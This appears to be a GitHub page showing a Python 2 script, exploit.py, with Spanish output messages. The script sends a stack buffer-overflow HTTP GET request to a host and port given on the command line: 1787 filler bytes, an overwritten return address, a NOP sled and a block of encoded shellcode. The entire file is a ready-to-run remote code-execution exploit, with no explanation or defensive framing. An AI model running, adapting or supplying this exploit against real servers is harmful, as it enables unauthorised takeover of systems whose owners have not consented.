-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
46 lines (45 loc) · 2.13 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
import socket
import sys
from time import sleep
try:
host = sys.argv[1]
puerto = sys.argv[2]
except:
print ("[*]USO python2 {} <Direccion IP> <Puerto> ").format(sys.argv[0])
sys.exit()
shellcode = ("\xdb\xde\xbd\x74\xf9\x07\x95\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x53\x83\xc0\x04\x31\x68\x13\x03\x1c\xea\xe5\x60\x20\xe4\x68"
"\x8a\xd8\xf5\x0c\x02\x3d\xc4\x0c\x70\x36\x77\xbd\xf2\x1a\x74"
"\x36\x56\x8e\x0f\x3a\x7f\xa1\xb8\xf1\x59\x8c\x39\xa9\x9a\x8f"
"\xb9\xb0\xce\x6f\x83\x7a\x03\x6e\xc4\x67\xee\x22\x9d\xec\x5d"
"\xd2\xaa\xb9\x5d\x59\xe0\x2c\xe6\xbe\xb1\x4f\xc7\x11\xc9\x09"
"\xc7\x90\x1e\x22\x4e\x8a\x43\x0f\x18\x21\xb7\xfb\x9b\xe3\x89"
"\x04\x37\xca\x25\xf7\x49\x0b\x81\xe8\x3f\x65\xf1\x95\x47\xb2"
"\x8b\x41\xcd\x20\x2b\x01\x75\x8c\xcd\xc6\xe0\x47\xc1\xa3\x67"
"\x0f\xc6\x32\xab\x24\xf2\xbf\x4a\xea\x72\xfb\x68\x2e\xde\x5f"
"\x10\x77\xba\x0e\x2d\x67\x65\xee\x8b\xec\x88\xfb\xa1\xaf\xc4"
"\xc8\x8b\x4f\x15\x47\x9b\x3c\x27\xc8\x37\xaa\x0b\x81\x91\x2d"
"\x6b\xb8\x66\xa1\x92\x43\x97\xe8\x50\x17\xc7\x82\x71\x18\x8c"
"\x52\x7d\xcd\x39\x5a\xd8\xbe\x5f\xa7\x9a\x6e\xe0\x07\x73\x65"
"\xef\x78\x63\x86\x25\x11\x0c\x7b\xc6\x0c\x91\xf2\x20\x44\x39"
"\x53\xfa\xf0\xfb\x80\x33\x67\x03\xe3\x6b\x0f\x4c\xe5\xac\x30"
"\x4d\x23\x9b\xa6\xc6\x20\x1f\xd7\xd8\x6c\x37\x80\x4f\xfa\xd6"
"\xe3\xee\xfb\xf2\x93\x93\x6e\x99\x63\xdd\x92\x36\x34\x8a\x65"
"\x4f\xd0\x26\xdf\xf9\xc6\xba\xb9\xc2\x42\x61\x7a\xcc\x4b\xe4"
"\xc6\xea\x5b\x30\xc6\xb6\x0f\xec\x91\x60\xf9\x4a\x48\xc3\x53"
"\x05\x27\x8d\x33\xd0\x0b\x0e\x45\xdd\x41\xf8\xa9\x6c\x3c\xbd"
"\xd6\x41\xa8\x49\xaf\xbf\x48\xb5\x7a\x04\x78\xfc\x26\x2d\x11"
"\x59\xb3\x6f\x7c\x5a\x6e\xb3\x79\xd9\x9a\x4c\x7e\xc1\xef\x49"
"\x3a\x45\x1c\x20\x53\x20\x22\x97\x54\x61")
if __name__ == "__main__":
#struct.pack('<L', "76E54E5B") "\x5b\xe4\x5e\x76"
try:
buffer = "GET " + 1787 * "A" + "\x4a\x75\xd7\x77" + "\x90" * 20 + shellcode + " HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,int(puerto)))
s.send(buffer)
s.close()
print "Conectandooooo..."
except:
print "Algo ha ido mal"
sys.exit()